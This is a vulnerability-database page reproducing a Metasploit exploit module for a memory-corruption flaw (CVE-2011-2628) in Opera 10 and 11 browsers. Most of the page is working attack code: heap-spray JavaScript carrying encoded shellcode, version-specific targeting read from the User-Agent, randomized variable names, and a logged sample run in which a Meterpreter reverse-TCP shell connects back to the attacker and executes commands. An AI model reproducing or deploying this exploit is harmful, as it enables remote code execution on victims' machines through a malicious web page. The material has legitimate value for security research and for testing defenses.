Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Opera 10/11 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit)

🗓️ 06 Oct 2011 00:00:00Reported by Jose A. VazquezType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 36 Views

Opera 10/11 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit) This module exploits a vulnerability in the nesting of frameset and iframe tags as implemented within Opera Browser. A memory corruption is triggered and some pointers got corrupted with invalid addresses. Successfully exploiting leads to remote code execution or denial of service condition under Windows XP SP3 (DEP = off)

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Opera 10/11 (bad nesting with frameset tag) Memory Corruption
5 Oct 201100:00
zdt
Tenable Nessus		Opera < 11.11 Multiple Vulnerabilities
19 May 201100:00
nessus
Tenable Nessus		GLSA-201206-03 : Opera: Multiple vulnerabilities
21 Jun 201200:00
nessus
Tenable Nessus		Opera < 11.11 Multiple Vulnerabilities
19 May 201100:00
nessus
Circl		CVE-2011-2628
6 Oct 201100:00
circl
CVE		CVE-2011-2628
1 Jul 201110:00
cve
Cvelist		CVE-2011-2628
1 Jul 201110:00
cvelist
exploitpack		Opera 1011 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit)
6 Oct 201100:00
exploitpack
Gentoo Linux		Opera: Multiple vulnerabilities
15 Jun 201200:00
gentoo
NVD		CVE-2011-2628
1 Jul 201110:55
nvd
Rows per page
###############################################################################################################
# Exploit for Opera 10/11 (bad nesting with frameset tag) Memory Corruption
#
# Vulnerability:
#
# Discovered: 2010-08-18
# Patched: 2011-05-18
# Tested on: v10.xx (v10.00, v10.01, v10.10, v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63)
#							v11.xx < v11.11 (v11.00, v11.01 and v11.10)
# Patched on: v11.11
#
# Exploit:
#
# Coded: 2010-09-23
# Last revision: 2011-09-30
#
# RCE on: v10.00, v10.50, v10.51, v10.52, v10.54, v10.60, v10.62, v11.00, v11.01 and v11.10*
# DoS on: v10.01, v10.10, v10.53, v10.61 and v10.63
#
# Notes:
#
#	1) DEP bypass: possible but unreliable.
#	2) Let me know if you improve this one ;)
#	3) Most of times, it won't work at first attempt and need crash-dialog interaction.
#
# Credits: Jose A. Vazquez of http://spa-s3c.blogspot.com
#
# Greets to: Ruben, Sinn3r, Metasploit Team, Corelan Team, etc
#
# Running against Opera v10.62...
#
#
#        =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
# + -- --=[ 741 exploits - 378 auxiliary - 82 post
# + -- --=[ 228 payloads - 27 encoders - 8 nops
#        =[ svn r13801 updated 3 days ago (2011.09.27)
#
# msf > use windows/browser/opera_frameset_tag
# msf  exploit(opera_frameset_tag) > set payload windows/meterpreter/reverse_tcp
# payload => windows/meterpreter/reverse_tcp
# msf  exploit(opera_frameset_tag) > set LHOST 192.168.1.103
# LHOST => 192.168.1.103
# msf  exploit(opera_frameset_tag) > exploit
# [*] Exploit running as background job.
#
# [*] Started reverse handler on 192.168.1.103:4444
# msf  exploit(opera_frameset_tag) >
# [*] Using URL: http://0.0.0.0:8080/sUpFmezLW6jS
# [*]  Local IP: http://192.168.1.103:8080/sUpFmezLW6jS
# [*] Server started.
# [*] Sending Opera 10/11 (bad nesting with frameset tag) Memory Corruption to 192.168.1.104:1185 (target: Opera Browser (v10.6x - v11.xx) / Windows XP SP3 (DEP-default))
# [*] Sending stage 1 (Spraying the heap)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage (752128 bytes) to 192.168.1.104
# [*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.104:1190) at 2011-09-30 19:23:28 +0200
# Interrupt: use the 'exit' command to quit
# msf  exploit(opera_frameset_tag) > sessions
#
# Active sessions
# ===============
#
#   Id  Type                   Information                              Connection
#   --  ----                   -----------                              ----------
#   1   meterpreter x86/win32  0XDE1-A39ED4C12\0xde1 @ 0XDE1-A39ED4C12  192.168.1.103:4444 -> 192.168.1.104:1190
#
# msf  exploit(opera_frameset_tag) > sessions -i 1
# [*] Starting interaction with 1...
#
# meterpreter > getuid
# Server username: 0XDE1-A39ED4C12\0xde1
# meterpreter > execute -f  calc.exe
# Process 1336 created.
# meterpreter > exit
# [*] Shutting down Meterpreter...
# msf  exploit(opera_frameset_tag) >
#
################################################################################################################

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	
	def initialize(info = {})
	
		super(update_info(info,
			'Name'           => 'Opera 10/11 (bad nesting with frameset tag) Memory Corruption',
			'Description'    => %q{
			
				This module exploits a vulnerability in the nesting of frameset and iframe tags as implemented within 
				Opera Browser. A memory corruption is triggered and some pointers got corrupted with invalid addresses. 
				Successfully exploiting leads to remote code execution or denial of service condition under Windows XP 
				SP3 (DEP = off).
				
				Note than most of cases, it won't work at first attempt and need crash-dialog interaction. 
				Read the last reference for further details.
				
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Jose A. Vazquez'
				],
			'Version'        => '$Revision: 0011 $',
			'References'     =>
				[
					['CVE', '2011-2628'],
					['OSVDB', '72406'],
					['BID', '47906'],
					['URL', 'http://www.opera.com/support/kb/view/992/'],
					['URL', 'http://www.beyondsecurity.com/ssd.html'],
					['URL', 'http://spa-s3c.blogspot.com/2011/05/spas3c-sv-004opera-browser-1111.html'],
					['URL', 'http://spa-s3c.blogspot.com/2011/09/spas3c-sv-004reliability-tests-ssd.html']
				],
			'DefaultOptions' =>
				{
					'EXITFUNC'          => 'process',
					'HTTP::compression' => 'gzip',
					'HTTP::chunked'     => true
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'Compat'   =>
						{
							'ConnectionType' => '-find',
						},
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Automatic
					[ 'Automatic',
						{}
					],
					
					# Opera > v10.54 ~ spray of 350 MB
					[ 'Opera Browser (v10.6x - v11.xx) / Windows XP SP3 (DEP-default)',  
						{
							'SizeofSpray' => 700,
							'Ret' => 0x0c0c0c0c
						}
					],
					
					# Opera <= v10.54 ~ spray of 250 MB
					[ 'Opera Browser (v10.50 - v10.54) / Windows XP SP3 (DEP-default)',  
						{
							'SizeofSpray' => 500,
							'Ret' => 0x0c0c0c0c
						}
					],
					
					# Opera < v10.50 doesn't get crashed with previous method and it needs this one.
					[ 'Opera Browser (v10.00 - v10.10) / Windows XP SP3 (DEP-default)',  
						{
							'SizeofSpray' => 500,
							'Ret' => 0x0c0c0c0c
						}
					]
				],
			'DisclosureDate' => '5 October 2011',
			'DefaultTarget'  => 0))
			
	end
	
	#I don't know if Msf::Exploit::Remote::BrowserAutopwn works, but I'm going to include my own auto-target selection 
	
	def automatic_target(cli, request)

		thistarget = nil
	
		agent = request.headers['User-Agent']

		if agent =~ /Version\/10\.00/ or agent =~ /Version\/10\.01/ or agent =~ /Version\/10\.10/ 
			thistarget = targets[3]
		elsif agent =~ /Version\/10\.50/ or agent =~ /Version\/10\.51/ or agent =~ /Version\/10\.52/ or agent =~ /Version\/10\.53/ or agent =~ /Version\/10\.54/
			thistarget = targets[2]
		else
			thistarget = targets[1]
		end
		
		thistarget
		
	end
	
	def on_request_uri(cli, request)
	
		mytarget = target
		
		if target.name == 'Automatic'
			mytarget = automatic_target(cli, request)
		end
	
		if(request.uri =~ /\.xhtml$/)
		
			#Send file for trigger the vulnerability for cases > v10.10		
				
			html = %Q|
					<html xmlns="http://www.w3.org/1999/xhtml" xmlns:xht="http://www.w3.org/1999/xhtml">
					<meta http-equiv="refresh" content="0;url=" />	
						<xht:frameset>
							<xht:iframe>
								<xht:script>
								rbc
								</xht:script>
								<style type="text/css">
									<!-- /* padding CSS */

									approx:root{	
										font: 333em;
									}
									-->
								</style>
							</xht:iframe>
						</xht:frameset>
					</html>
				|
		
			#Send triggerer
		
			print_status("Sending stage 2 (Triggering the vulnerability)")
			
			var_contentype = 'application/xhtml+xml'
			
		else
			
			#Send payload + hide iframe for trigger the vuln
		
			#Re-generate the payload
		
			return if ((p = regenerate_payload(cli)) == nil)
			
			#Encode the shellcode
			
			shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
			
			#Ret
			
			addr_word  = [mytarget.ret].pack('V').unpack('H*')[0][0,4]
			
			#Randomize the javascript variable names
			
			var_buffer    	= 	rand_text_alpha(rand(30)+2)
			var_shellcode	= 	rand_text_alpha(rand(30)+2)
			var_unescape  	= 	rand_text_alpha(rand(30)+2)
			var_x         	= 	rand_text_alpha(rand(30)+2)
			var_i         	= 	rand_text_alpha(rand(30)+2)

			var_size      	= 	rand_text_alpha(rand(30)+2)
			var_nopsize   	= 	rand_text_alpha(rand(30)+2)
			var_limit     	= 	rand_text_alpha(rand(30)+2)
			
			var_function_trigger 	= 	rand_text_alpha(rand(30)+2)
			var_file_trigger	=	rand_text_alpha(rand(30)+2)
			
			var_timer_trigger = (rand(3) + 2) * 1000
			
			#Build the exploit
			
			var_url =  ((datastore['SSL']) ? "https://" : "http://")
			var_url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])
			var_url << ":" + datastore['SRVPORT']
			var_url << get_resource
			
			#Sending init HTML
			print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})")
			
			if mytarget.name =~ /v10.00/
			
			# Case v10.00 - v10.10
			
				html = %Q|
					<html xmlns="http://www.w3.org/1999/xhtml" xmlns:xht="http://www.w3.org/1999/xhtml">
						<xht:frameset>
							<xht:iframe>
								<xht:script>
									aaaaaa
								</xht:script>
							</xht:iframe>
						</xht:frameset>
						<script type="text/javascript">
							<![CDATA[
								var #{var_unescape}  = unescape;
								var #{var_shellcode} = #{var_unescape}("#{shellcode}");

								var #{var_size} = #{var_shellcode}.length * 2;
								var #{var_nopsize} = 0x100000 - (#{var_size} + 0x14);
								var #{var_buffer} = #{var_unescape}("%u#{addr_word}");
														
								while ( #{var_buffer}.length * 2 < #{var_nopsize} ) {
									#{var_buffer} += #{var_buffer};
								}

								var #{var_x} = new Array();
									
								for ( var #{var_i} =0; #{var_i} < #{mytarget['SizeofSpray']}; #{var_i}++ ) {
									#{var_x}[ #{var_i} ] = #{var_buffer} + #{var_shellcode};
								}
								setInterval("location.reload()", 500);
							]]>
						</script>
					<html>
					|	
		
				print_status("Sending simple stage (Sprayer and Triggerer)")
				var_contentype = 'application/xhtml+xml'
			
			else
			
			# Case > v10.10
			
				html = %Q|
						<html>
							<head>
								<script type="text/javascript">
									var #{var_unescape}  = unescape;
									var #{var_shellcode} = #{var_unescape}("#{shellcode}");

									var #{var_size} = #{var_shellcode}.length * 2;
									var #{var_nopsize} = 0x100000 - (#{var_size} + 0x14);
									var #{var_buffer} = #{var_unescape}("%u#{addr_word}");
													
									while ( #{var_buffer}.length * 2 < #{var_nopsize} ) {
										#{var_buffer} += #{var_buffer};
									}

									var #{var_x} = new Array();
									
									for ( var #{var_i} =0; #{var_i} < #{mytarget['SizeofSpray']}; #{var_i}++ ) {
										#{var_x}[ #{var_i} ] = #{var_buffer} + #{var_shellcode};
									}
									
									function #{var_function_trigger}(){
										document.write("<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>");
									}
									
									setTimeout('#{var_function_trigger}()',#{var_timer_trigger});
									
								</script>
							</head>
						<html>
					|	
					
				print_status("Sending stage 1 (Spraying the heap)")
				var_contentype = 'text/html'
				
			end
				
		end
	
		#Response
		send_response(cli, html, { 'Content-Type' => var_contentype, 'Pragma' => 'no-cache' })
		#Handle the payload			
		handler(cli)
		
	end
	
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Oct 2011 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.10554
operamemory corruptionframeset tagremote code executiondenial of servicewindows xp sp3
36